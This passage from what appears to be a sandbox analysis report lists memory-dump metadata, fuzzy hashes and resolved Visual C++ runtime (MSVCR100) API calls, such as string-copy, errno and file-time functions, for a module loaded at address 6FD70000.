                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$freewcslen$_calloc_crt_waccess_swcscpy_s$AttributesFile_invalid_parameter_noinfo_invoke_watson_lock_wdupenv_s_wfullpath
                                                                                                          • String ID:
                                                                                                          • API String ID: 2532373603-0
                                                                                                          • Opcode ID: c4ad68803143e536c91f90cd71ac1cd1f55f47a2546879041117e4f92c2cfdc0
                                                                                                          • Instruction ID: d3f15a18d89f95a07eb2c98ff90a9c0b8565b84a98ea43fe3e2a92659cd4fd48
                                                                                                          • Opcode Fuzzy Hash: c4ad68803143e536c91f90cd71ac1cd1f55f47a2546879041117e4f92c2cfdc0
                                                                                                          • Instruction Fuzzy Hash: E3916EB5D44329DADBA19F74DC88B9977B5AF05344F1001EAD419EB290EB30BAC08FA1
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD21D7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD21E2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _mbsrchr.MSVCR100(?,0000005C), ref: 6FDD220B
                                                                                                          • _mbsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6FDD2215
                                                                                                          • _mbschr.MSVCR100(?,0000003A), ref: 6FDD2228
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD2236
                                                                                                          • _calloc_crt.MSVCR100(00000003,00000001,?), ref: 6FDD2241
                                                                                                          • strcpy_s.MSVCR100(00000000,00000003,6FDB3020), ref: 6FDD225D
                                                                                                          • strcat_s.MSVCR100(00000000,00000003,?), ref: 6FDD226C
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2284
                                                                                                          • _mbsrchr.MSVCR100(00000000,0000002E), ref: 6FDD229A
                                                                                                          • _access_s.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD22AA
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD22D8
                                                                                                          • _calloc_crt.MSVCR100(00000005,00000001,?), ref: 6FDD22E3
                                                                                                          • strcpy_s.MSVCR100(00000000,00000005,?), ref: 6FDD2300
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD2313
                                                                                                          • _errno.MSVCR100 ref: 6FDD231C
                                                                                                          • strcpy_s.MSVCR100(00000000,00000005,X_o), ref: 6FDD2338
                                                                                                          • _access_s.MSVCR100(00000000,00000000), ref: 6FDD234A
                                                                                                          • _errno.MSVCR100 ref: 6FDD2364
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD2384
                                                                                                          • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2395
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_mbsrchrstrcpy_sstrlen$_access_s_calloc_crtfree$_invalid_parameter_invalid_parameter_noinfo_invoke_watson_mbschrstrcat_s
                                                                                                          • String ID: X_o$X_o
                                                                                                          • API String ID: 3386543907-3302424219
                                                                                                          • Opcode ID: b9582f367145c1780d630e925c0a53a4d608a402c07b9a2e03c0ae774bff502e
                                                                                                          • Instruction ID: 57f3a2da187598ac39cd7823d00d9c240091f67703da3e64deb700d5eb0ebc8c
                                                                                                          • Opcode Fuzzy Hash: b9582f367145c1780d630e925c0a53a4d608a402c07b9a2e03c0ae774bff502e
                                                                                                          • Instruction Fuzzy Hash: E4510332D04305EBEB919FB58C41B9E7BB8AF01369F100165FD24AB1D0EB31BA4187B1
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD2999
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD29A4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcsrchr.MSVCR100(?,0000005C), ref: 6FDD29CF
                                                                                                          • wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6FDD29D9
                                                                                                          • wcschr.MSVCR100(?,0000003A), ref: 6FDD29EC
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD29FA
                                                                                                          • _calloc_crt.MSVCR100(00000003,00000002,?), ref: 6FDD2A05
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000003,6FDB3040), ref: 6FDD2A21
                                                                                                          • wcscat_s.MSVCR100(00000000,00000003,?), ref: 6FDD2A30
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2A48
                                                                                                          • wcsrchr.MSVCR100(00000000,0000002E), ref: 6FDD2A5E
                                                                                                          • _waccess_s.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2A6E
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD2A99
                                                                                                          • _calloc_crt.MSVCR100(00000005,00000002,?), ref: 6FDD2AA4
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000005,?), ref: 6FDD2AC1
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD2AD4
                                                                                                          • _errno.MSVCR100 ref: 6FDD2AE0
                                                                                                          • wcscpy_s.MSVCR100(?,?,6FE25F68), ref: 6FDD2B01
                                                                                                          • _waccess_s.MSVCR100(00000000,00000000), ref: 6FDD2B13
                                                                                                          • _errno.MSVCR100 ref: 6FDD2B2B
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD2B45
                                                                                                          • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2B56
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errnowcscpy_swcslenwcsrchr$_calloc_crt_waccess_sfree$_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscat_swcschr
                                                                                                          • String ID: \_o$h_o
                                                                                                          • API String ID: 1544770758-1414048
                                                                                                          • Opcode ID: 7413c1864153df66205e7aea0eec794575bc74d60dadbb1226189d7de5747867
                                                                                                          • Instruction ID: b42803c2cc32b24531116f77a3284a63fbf8c86b1e72e9d27563cf293af007d4
                                                                                                          • Opcode Fuzzy Hash: 7413c1864153df66205e7aea0eec794575bc74d60dadbb1226189d7de5747867
                                                                                                          • Instruction Fuzzy Hash: F851C272904305EADBA59FB48C41E9E7BB8EF0536EF111165F924AB1D0EB71BA0187A0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD2B9B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD2BA6
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD2BBD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD2BC8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID: PATH
                                                                                                          • API String ID: 1328987296-1036084923
                                                                                                          • Opcode ID: 747eaed7307baee5c6846f948acd7802358629c09fe082c6d537b6d4520827fb
                                                                                                          • Instruction ID: e390f4154bcf1ad79d4202cfd152271f936c2339ad02474c005f12575dd523e4
                                                                                                          • Opcode Fuzzy Hash: 747eaed7307baee5c6846f948acd7802358629c09fe082c6d537b6d4520827fb
                                                                                                          • Instruction Fuzzy Hash: A2512772905305EBDB915FA4CC809AE73B59F023AFF20442AF9209B190E775BDC197B2
                                                                                                          APIs
                                                                                                          • wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD9221D
                                                                                                          • wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD92228
                                                                                                          • _calloc_crt.MSVCR100(00000002,00000002), ref: 6FD92247
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6FD9225E
                                                                                                          • wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6FD9227B
                                                                                                            • Part of subcall function 6FD91FBA: wcschr.MSVCR100(00000000,0000003D,7650DF80,00000000,00000000), ref: 6FD91FE5
                                                                                                            • Part of subcall function 6FD91FBA: free.MSVCR100(?,7650DF80,00000000,00000000), ref: 6FD92058
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922B9
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922D5
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000001), ref: 6FD922E2
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922FB
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FD9230D
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD9232B
                                                                                                          • _errno.MSVCR100 ref: 6FD92350
                                                                                                          • _errno.MSVCR100(?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB0FCE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB0FD9
                                                                                                          • wcschr.MSVCR100(?,0000003D,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB0FE9
                                                                                                          • wcsnlen.MSVCR100(-00000002,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB100D
                                                                                                          • wcslen.MSVCR100(?,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1019
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000002,?,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1024
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6FDB103A
                                                                                                          • _errno.MSVCR100(?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1047
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1052
                                                                                                          • free.MSVCR100(00000000), ref: 6FDB106D
                                                                                                          • free.MSVCR100(?), ref: 6FDB108F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$strlenwcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4036047774-0
                                                                                                          • Opcode ID: 6685b5d76d50197a850b0b25ff221914c08fbb8da60f012afc37bbdb0b3d6940
                                                                                                          • Instruction ID: d2553643eb8851e31a89df4ac1165988d3bc3f8fc05b44811ecce256cee054c0
                                                                                                          • Opcode Fuzzy Hash: 6685b5d76d50197a850b0b25ff221914c08fbb8da60f012afc37bbdb0b3d6940
                                                                                                          • Instruction Fuzzy Hash: 6C51C1B250A318FACB516FE48C88D9F3B68DF46B79B20025EF129961D0DB35B64196B0
                                                                                                          APIs
                                                                                                          • _set_error_mode.MSVCR100(00000003,00000001,00000001,00000000), ref: 6FDCC086
                                                                                                          • _set_error_mode.MSVCR100(00000003,00000001,00000001,00000000), ref: 6FDCC097
                                                                                                          • wcscpy_s.MSVCR100(6FE27D70,00000314,Runtime Error!Program: ,00000001,00000001,00000000), ref: 6FDCC0CA
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6FE27DA2,00000104,00000001,00000001,00000000), ref: 6FDCC0EC
                                                                                                          • wcscpy_s.MSVCR100(6FE27DA2,000002FB,<program name unknown>), ref: 6FDCC102
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC115
                                                                                                          • wcslen.MSVCR100(00000001,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC11B
                                                                                                          • wcslen.MSVCR100(00000314,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC128
                                                                                                          • wcsncpy_s.MSVCR100(00000000,00000000,...,00000003,00000314,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC145
                                                                                                          • wcscat_s.MSVCR100(6FE27D70,00000314,6FDCC200,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC15D
                                                                                                          • wcscat_s.MSVCR100(6FE27D70,00000314,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001), ref: 6FDCC171
                                                                                                          • GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000), ref: 6FDCC19E
                                                                                                          • strlen.MSVCR100(?,?,00000000), ref: 6FDCC1DB
                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 6FDCC1EA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_set_error_modewcscat_swcscpy_swcslen$HandleModuleNameWrite_invoke_watsonstrlenwcsncpy_s
                                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $p}o
                                                                                                          • API String ID: 258868472-2225776274
                                                                                                          • Opcode ID: 2c6a75c376e0f0bd1ccd4a6977bceb536d23bbf17dd7ed4535187ff10e85e501
                                                                                                          • Instruction ID: 7663333f4043c8b549c3d1df3bffda1503559324ec27bb0f0ee23c97d3d599ab
                                                                                                          • Opcode Fuzzy Hash: 2c6a75c376e0f0bd1ccd4a6977bceb536d23bbf17dd7ed4535187ff10e85e501
                                                                                                          • Instruction Fuzzy Hash: 7F412B73940355AAEB8157768C44FFF36AC9F0676CF110136FA54E71C0EB20BA4245A2
                                                                                                          APIs
                                                                                                          • _FindAndUnlinkFrame.MSVCR100(?), ref: 6FD98560
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983D7
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983EB
                                                                                                          • _getptd.MSVCR100 ref: 6FD98576
                                                                                                          • _getptd.MSVCR100 ref: 6FD98585
                                                                                                          • _getptd.MSVCR100 ref: 6FD98596
                                                                                                          • _getptd.MSVCR100 ref: 6FD985AA
                                                                                                          • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6FD985B8
                                                                                                            • Part of subcall function 6FD983AA: _getptd.MSVCR100 ref: 6FD983AF
                                                                                                          • _getptd.MSVCR100(00000001), ref: 6FD985C4
                                                                                                          • __DestructExceptionObject.MSVCR100(?,00000001), ref: 6FD985CF
                                                                                                          • _getptd.MSVCR100 ref: 6FD985D6
                                                                                                          • _getptd.MSVCR100 ref: 6FD985E5
                                                                                                          • _getptd.MSVCR100 ref: 6FD985F6
                                                                                                          • _getptd.MSVCR100 ref: 6FD98614
                                                                                                          • _getptd.MSVCR100 ref: 6FD98622
                                                                                                          • _getptd.MSVCR100 ref: 6FDACA42
                                                                                                          • _getptd.MSVCR100 ref: 6FDACA5A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          APIs
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD712D7
                                                                                                          • free.MSVCR100(?), ref: 6FD7131B
                                                                                                          • _malloc_crt.MSVCR100(00000004), ref: 6FD866EF
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • _calloc_crt.MSVCR100(00000180,00000002,00000004), ref: 6FD866FF
                                                                                                          • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000002,00000004), ref: 6FD8670A
                                                                                                          • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6FD86715
                                                                                                          • _calloc_crt.MSVCR100(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6FD86724
                                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 6FD86777
                                                                                                          • __crtLCMapStringA.MSVCR100(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6FD867EE
                                                                                                          • __crtLCMapStringA.MSVCR100(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6FD8681B
                                                                                                          • memcpy.MSVCR100(?,?,000000FE), ref: 6FD86875
                                                                                                          • memcpy.MSVCR100(?,?,0000007F,?,?,000000FE), ref: 6FD86884
                                                                                                          • memcpy.MSVCR100(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6FD86896
                                                                                                          • free.MSVCR100(?), ref: 6FD868EB
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(?,?), ref: 6FDB0A6E
                                                                                                          • free.MSVCR100(?,?,?), ref: 6FDB0A76
                                                                                                          • free.MSVCR100(?,?,?,?), ref: 6FDB0A7E
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4A8F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4A9A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4AB1
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4AC2
                                                                                                          • _fileno.MSVCR100(00000000,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4ACE
                                                                                                          • _errno.MSVCR100(?,?,?,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B28
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B33
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B44
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B4E
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B9F
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4BA9
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4BBA
                                                                                                          • _filbuf.MSVCR100(00000000,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4BC0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8488,00000064,6FDCFF68,000000FF,?), ref: 6FDF8161
                                                                                                          • _errno.MSVCR100(6FDF8488,00000064,6FDCFF68,000000FF,?), ref: 6FDF8168
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF8173
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • memset.MSVCR100(?,00000000,00000030,6FDF8488,00000064,6FDCFF68,000000FF,?), ref: 6FDF8184
                                                                                                          • __doserrno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF8191
                                                                                                          • _errno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF8198
                                                                                                          • __doserrno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF81B1
                                                                                                          • _errno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF81B8
                                                                                                          • __doserrno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF81E3
                                                                                                          • _errno.MSVCR100 ref: 6FDF8203
                                                                                                          • GetFileType.KERNEL32(00000000,6FDCFF68,000000FF,?), ref: 6FDF822A
                                                                                                          • GetLastError.KERNEL32 ref: 6FDF824C
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDF8253
                                                                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 6FDF82B3
                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FDF82F9
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF833A
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF8350
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF83A0
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF83B6
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF8406
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF841C
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF70F8,00000064,6FDCF1C9,000000FF,?), ref: 6FDF6DF0
                                                                                                          • _errno.MSVCR100(6FDF70F8,00000064,6FDCF1C9,000000FF,?), ref: 6FDF6DF7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E02
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • memset.MSVCR100(?,00000000,00000024,6FDF70F8,00000064,6FDCF1C9,000000FF,?), ref: 6FDF6E13
                                                                                                          • __doserrno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E20
                                                                                                          • _errno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E27
                                                                                                          • __doserrno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E40
                                                                                                          • _errno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E47
                                                                                                          • __doserrno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E72
                                                                                                          • _errno.MSVCR100 ref: 6FDF6E92
                                                                                                          • GetFileType.KERNEL32(00000000,6FDCF1C9,000000FF,?), ref: 6FDF6EB9
                                                                                                          • GetLastError.KERNEL32 ref: 6FDF6EDB
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDF6EE2
                                                                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 6FDF6F3F
                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FDF6F74
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF6FB5
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF6FCB
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF701B
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF7031
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF7081
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF7097
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8120,00000068,6FDA7DA5,000000FF,?), ref: 6FDF7DF1
                                                                                                          • _errno.MSVCR100(6FDF8120,00000068,6FDA7DA5,000000FF,?), ref: 6FDF7DF8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E03
